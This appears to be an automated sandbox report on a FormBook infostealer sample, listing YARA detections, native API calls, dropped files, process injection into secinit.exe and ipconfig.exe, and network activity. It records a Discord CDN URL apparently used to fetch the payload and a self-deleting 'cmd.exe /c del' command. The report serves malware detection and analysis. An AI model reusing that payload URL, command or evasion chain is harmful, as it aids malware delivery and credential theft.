Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653912925.0000000000789000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/831802482459672609/839049205866561576/Vylsmojatnhhurydzinydcl
Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown

HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49739 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPE

System Summary:

Detected FormBook malware

Show sources

Source: C:\Windows\SysWOW64\ipconfig.exe	Dropped file: C:\Users\user\AppData\Roaming\50M6QC82\50Mlogri.ini			Jump to dropped file
Source: C:\Windows\SysWOW64\ipconfig.exe	Dropped file: C:\Users\user\AppData\Roaming\50M6QC82\50Mlogrv.ini			Jump to dropped file

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038897A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038896E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038899A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038895D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038898F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0388A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889FE0 NtCreateMutant,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0388A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889760 NtOpenProcess,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0388A770 NtOpenThread,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038896D0 NtCreateKey,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889A10 NtQuerySection,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889650 NtQueryValueKey,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038899D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038895F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0388AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889560 NtWriteFile,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038898A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0388B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_10429850 NtCreateFile,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_10429900 NtReadFile,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_10429980 NtClose,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_10429A30 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042984A NtCreateFile,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_104298FB NtReadFile,
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042997A NtClose,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9B00 NtSetValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC95D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9560 NtWriteFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC96D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9770 NtSetInformationFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC98A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC98F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BCB040 NtSuspendThread,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC99D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9A20 NtResumeThread,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9A10 NtQuerySection,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BCA3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC95F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BCAD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9660 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9650 NtQueryValueKey,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC97A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BCA710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BCA770 NtOpenThread,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9760 NtOpenProcess,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00169850 NtCreateFile,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00169900 NtReadFile,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00169980 NtClose,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016984A NtCreateFile,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_001698FB NtReadFile,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016997A NtClose,
Source: C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe	Code function: 21_2_00F1146F RtlInitUnicodeString,NtOpenEvent,NtCreateEvent,NtOpenEvent,WaitForSingleObject,NtClose,NetJoinDomain,

Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387EBB0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03866E30
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03872581
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385D5E0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384F900
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03840D20
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03864120
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03911D55
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385B090
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038720A0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901002
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385841F
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_10411030
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042CA46
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042DA5E
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042D29D
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042CB3E
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042D4B3
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_10412D90
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042DFE6
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042D7F9
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_10419F80
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_10412FB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB20A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9B090
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C528EC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C520A8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41002
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA4120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8F900
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C522AE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBEBB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4DBD2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C52B28
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4D466
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9841F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C525DD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB2581
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C51D55
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B80D20
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C52D07
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C52EF7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA6E30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4D616
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C51FF1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016DA5E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016CA46
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016D4B3
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00152D90
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00159F80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00152FB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016D7F9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016DFE6

Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 00B8B150 appears 35 times
Source: C:\Windows\SysWOW64\secinit.exe	Code function: String function: 0384B150 appears 32 times

Source: f97e137e_by_Libranalysis.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@12/9@6/2

Source: C:\Windows\explorer.exe

File created: C:\Program Files (x86)\Adrldefcp

Jump to behavior

Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4388:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_01

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\Adrldefcp

Jump to behavior

Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: f97e137e_by_Libranalysis.exe	Virustotal: Detection: 26%
Source: f97e137e_by_Libranalysis.exe	ReversingLabs: Detection: 29%

Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe

File read: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe 'C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe'
Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Process created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\secinit.exe'
